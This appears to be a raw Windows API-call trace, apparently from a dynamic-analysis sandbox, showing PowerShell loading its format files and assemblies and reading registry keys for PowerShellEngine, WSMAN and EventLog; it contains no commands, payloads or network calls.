	[0402.385] ReadFile (in: hFile=0x1c8, lpBuffer=0x316c6cc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x316c6cc*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0402.385] ReadFile (in: hFile=0x1c8, lpBuffer=0x316d2b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x316d2b0*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0402.385] CloseHandle (hObject=0x1c8) returned 1
	[0402.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.385] SetErrorMode (uMode=0x1) returned 0x1
	[0402.385] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0402.385] SetErrorMode (uMode=0x1) returned 0x1
	[0402.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.386] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x1c8) returned 0x0
	[0402.386] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0402.386] CoTaskMemAlloc (cb=0x5a) returned 0x1885d0
	[0402.386] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1885d0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0402.386] CoTaskMemFree (pv=0x1885d0) 
	[0402.386] RegCloseKey (hKey=0x1c8) returned 0x0
	[0402.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.386] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa236d25c, Data2=0x2266, Data3=0x4c30, Data4=([0]=0xbe, [1]=0xf3, [2]=0xb, [3]=0xeb, [4]=0xaf, [5]=0xbb, [6]=0xa6, [7]=0x6d))) returned 0x0
	[0402.387] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x8127740b, Data2=0xd5f2, Data3=0x4e44, Data4=([0]=0x8b, [1]=0x81, [2]=0xf5, [3]=0x6, [4]=0xc8, [5]=0x36, [6]=0xb5, [7]=0x15))) returned 0x0
	[0402.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.387] SetErrorMode (uMode=0x1) returned 0x1
	[0402.387] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0402.387] GetFileType (hFile=0x1c8) returned 0x1
	[0402.387] SetErrorMode (uMode=0x1) returned 0x1
	[0402.387] GetFileType (hFile=0x1c8) returned 0x1
	[0402.387] ReadFile (in: hFile=0x1c8, lpBuffer=0x31ab098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x31ab098*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x31ab098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x31ab098*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x31ab098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x31ab098*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x31ab098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x31ab098*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x31ab098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x31ab098*, lpNumberOfBytesRead=0x28d478*=0xe98, lpOverlapped=0x0) returned 1
	[0402.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x31aa698, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x31aa698*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0402.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x31ab098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x31ab098*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0402.389] CloseHandle (hObject=0x1c8) returned 1
	[0402.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.795] SetErrorMode (uMode=0x1) returned 0x1
	[0402.795] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0402.795] SetErrorMode (uMode=0x1) returned 0x1
	[0402.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.795] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x1c8) returned 0x0
	[0402.796] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0402.796] CoTaskMemAlloc (cb=0x5a) returned 0x1885d0
	[0402.796] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1885d0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0402.796] CoTaskMemFree (pv=0x1885d0) 
	[0402.796] RegCloseKey (hKey=0x1c8) returned 0x0
	[0402.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.796] VirtualQuery (in: lpAddress=0x28bfa0, lpBuffer=0x28ce60, dwLength=0x30 | out: lpBuffer=0x28ce60*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.796] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x71a2f3b5, Data2=0xed6b, Data3=0x4bad, Data4=([0]=0xb3, [1]=0x6, [2]=0xb6, [3]=0xf0, [4]=0x6, [5]=0x9c, [6]=0x9c, [7]=0x54))) returned 0x0
	[0402.796] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7df32140, Data2=0x4056, Data3=0x49ea, Data4=([0]=0xac, [1]=0x19, [2]=0xcc, [3]=0x3d, [4]=0xed, [5]=0xe2, [6]=0x99, [7]=0xb9))) returned 0x0
	[0402.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0402.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0402.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0402.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0402.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0402.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0402.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0402.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0402.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0402.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0403.336] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0403.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.336] CoTaskMemFree (pv=0x147ca0) 
	[0403.338] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0403.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.338] CoTaskMemFree (pv=0x147ca0) 
	[0403.339] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0403.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.340] CoTaskMemFree (pv=0x147ca0) 
	[0403.732] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0403.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.732] CoTaskMemFree (pv=0x147ca0) 
	[0403.741] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0403.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.741] CoTaskMemFree (pv=0x147ca0) 
	[0403.742] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0403.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.742] CoTaskMemFree (pv=0x147ca0) 
	[0403.743] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0403.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.743] CoTaskMemFree (pv=0x147ca0) 
	[0403.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d718 | out: phkResult=0x28d718*=0x1c8) returned 0x0
	[0403.750] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d61c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d618, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d61c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d618*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0403.750] CoTaskMemFree (pv=0x0) 
	[0403.751] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0403.751] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x0, lpValueName=0x12b510, lpcchValueName=0x28d6c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28d6c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.751] CoTaskMemFree (pv=0x12b510) 
	[0403.751] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0403.751] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x1, lpValueName=0x12b510, lpcchValueName=0x28d6c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28d6c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.751] CoTaskMemFree (pv=0x12b510) 
	[0403.751] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0403.751] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x2, lpValueName=0x12b510, lpcchValueName=0x28d6c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28d6c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.752] CoTaskMemFree (pv=0x12b510) 
	[0403.752] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d6ac, lpData=0x0, lpcbData=0x28d6a8*=0x0 | out: lpType=0x28d6ac*=0x1, lpData=0x0, lpcbData=0x28d6a8*=0x8) returned 0x0
	[0403.752] CoTaskMemAlloc (cb=0xc) returned 0x19eef0
	[0403.752] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d67c, lpData=0x19eef0, lpcbData=0x28d678*=0x8 | out: lpType=0x28d67c*=0x1, lpData="2.0", lpcbData=0x28d678*=0x8) returned 0x0
	[0403.752] CoTaskMemFree (pv=0x19eef0) 
	[0404.254] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x330) returned 0x0
	[0404.254] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d56c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d568*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.254] CoTaskMemFree (pv=0x0) 
	[0404.254] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.254] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x12b510, lpcchValueName=0x28d618, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28d618, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0404.254] CoTaskMemFree (pv=0x12b510) 
	[0404.254] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.254] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x12b510, lpcchValueName=0x28d618, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28d618, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0404.254] CoTaskMemFree (pv=0x12b510) 
	[0404.254] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.254] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x12b510, lpcchValueName=0x28d618, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28d618, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0404.255] CoTaskMemFree (pv=0x12b510) 
	[0404.255] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d5fc, lpData=0x0, lpcbData=0x28d5f8*=0x0 | out: lpType=0x28d5fc*=0x1, lpData=0x0, lpcbData=0x28d5f8*=0x8) returned 0x0
	[0404.255] CoTaskMemAlloc (cb=0xc) returned 0x19eeb0
	[0404.255] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d5cc, lpData=0x19eeb0, lpcbData=0x28d5c8*=0x8 | out: lpType=0x28d5cc*=0x1, lpData="2.0", lpcbData=0x28d5c8*=0x8) returned 0x0
	[0404.255] CoTaskMemFree (pv=0x19eeb0) 
	[0404.256] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0404.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0404.256] CoTaskMemFree (pv=0x147ca0) 
	[0404.261] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0404.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0404.261] CoTaskMemFree (pv=0x147ca0) 
	[0404.640] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d698 | out: phkResult=0x28d698*=0x1d0) returned 0x0
	[0404.644] RegQueryInfoKeyW (in: hKey=0x1d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d60c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d608, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d60c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d608*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.644] CoTaskMemFree (pv=0x0) 
	[0404.645] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.645] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x0, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.645] CoTaskMemFree (pv=0x12b510) 
	[0404.645] CoTaskMemFree (pv=0x0) 
	[0404.645] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.645] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x1, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.645] CoTaskMemFree (pv=0x12b510) 
